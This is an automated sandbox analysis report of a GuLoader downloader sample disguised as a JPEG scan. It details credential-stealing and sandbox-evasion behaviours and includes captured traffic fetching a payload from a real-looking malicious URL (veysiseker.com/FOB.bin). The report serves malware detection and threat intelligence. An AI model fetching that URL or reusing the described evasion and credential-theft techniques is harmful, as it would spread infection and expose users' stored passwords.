Edit tour

Windows Analysis Report
jpgcamscanner_20240521_0072345_JPEG.bat.exe

Overview

General Information

Sample name:	jpgcamscanner_20240521_0072345_JPEG.bat.exe
Analysis ID:	1445937
MD5:	18776562551c3adcdc9f49c013772fbd
SHA1:	ee124b7cd0296b4e524454ab12059b8be60bc002
SHA256:	05df6f3430171cb7db9fa5f6782b8f67b14079b6e1dffbb013c33ca91b1ad5d3
Infos:

Detection

GuLoader

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Check if machine is in data center or colocation facility

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

jpgcamscanner_20240521_0072345_JPEG.bat.exe (PID: 1500 cmdline: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe" MD5: 18776562551C3ADCDC9F49C013772FBD)

dllhost.exe (PID: 7232 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} MD5: 08EB78E5BE019DF044C26B14703BD1FA)

jpgcamscanner_20240521_0072345_JPEG.bat.exe (PID: 7232 cmdline: "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe" MD5: 18776562551C3ADCDC9F49C013772FBD)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.24172966883.0000000033875000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.19322780922.0000000005951000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: jpgcamscanner_20240521_0072345_JPEG.bat.exe PID: 7232	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://veysiseker.com/FOB.bin

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

ReversingLabs: Detection: 34%

Machine Learning detection for sample

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Joe Sandbox ML: detected

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_0040626D FindFirstFileA,FindClose,	2_2_0040626D
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_00405732
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_004026FE FindFirstFileA,	2_2_004026FE
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_0040626D FindFirstFileA,FindClose,	4_2_0040626D
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_00405732
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_004026FE FindFirstFileA,	4_2_004026FE

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

Source: unknown

DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET /FOB.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: veysiseker.comCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /FOB.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: veysiseker.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: veysiseker.com
Source: global traffic	DNS traffic detected: DNS query: ip-api.com

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24163498581.0000000004BD0000.00000004.00001000.00020000.00000000.sdmp, jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002F78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://veysiseker.com/FOB.bin

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Code function: 2_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

2_2_004051CF

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_004031D6
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004031D6

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_00404A0E	2_2_00404A0E
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_004065F6	2_2_004065F6
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_6DDA1A9C	2_2_6DDA1A9C
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00404A0E	4_2_00404A0E
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_004065F6	4_2_004065F6
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00158908	4_2_00158908
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00154908	4_2_00154908
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_001581C5	4_2_001581C5
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00153CF0	4_2_00153CF0
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_0015BD00	4_2_0015BD00
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00154038	4_2_00154038
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_0015E73F	4_2_0015E73F
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A3D20	4_2_359A3D20
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A1BE0	4_2_359A1BE0
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A9366	4_2_359A9366
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A5E80	4_2_359A5E80
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359AA6B8	4_2_359AA6B8
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A46E8	4_2_359A46E8
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A0128	4_2_359A0128
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A64CF	4_2_359A64CF
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359A5798	4_2_359A5798
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_001589C2	4_2_001589C2

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Code function: String function: 00402ACB appears 48 times

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000002.00000000.19073539033.0000000000458000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerainiers.exe4 vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamerainiers.exe4 vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs jpgcamscanner_20240521_0072345_JPEG.bat.exe
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe	Binary or memory string: OriginalFilenamerainiers.exe4 vs jpgcamscanner_20240521_0072345_JPEG.bat.exe

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal92.troj.spyw.evad.winEXE@4/18@2/2

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		2_2_004031D6
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		4_2_004031D6

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Code function: 2_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

2_2_0040449B

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Code function: 2_2_004020D1 CoCreateInstance,MultiByteToWideChar,

2_2_004020D1

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsq45DA.tmp

Jump to behavior

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

ReversingLabs: Detection: 34%

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

File read: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process created: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe "C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe"
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}	Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: thumbcache.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: photometadatahandler.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: mfplat.dll	Jump to behavior
Source: C:\Windows\System32\dllhost.exe	Section loaded: rtworkq.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000002.00000002.19322780922.0000000005951000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

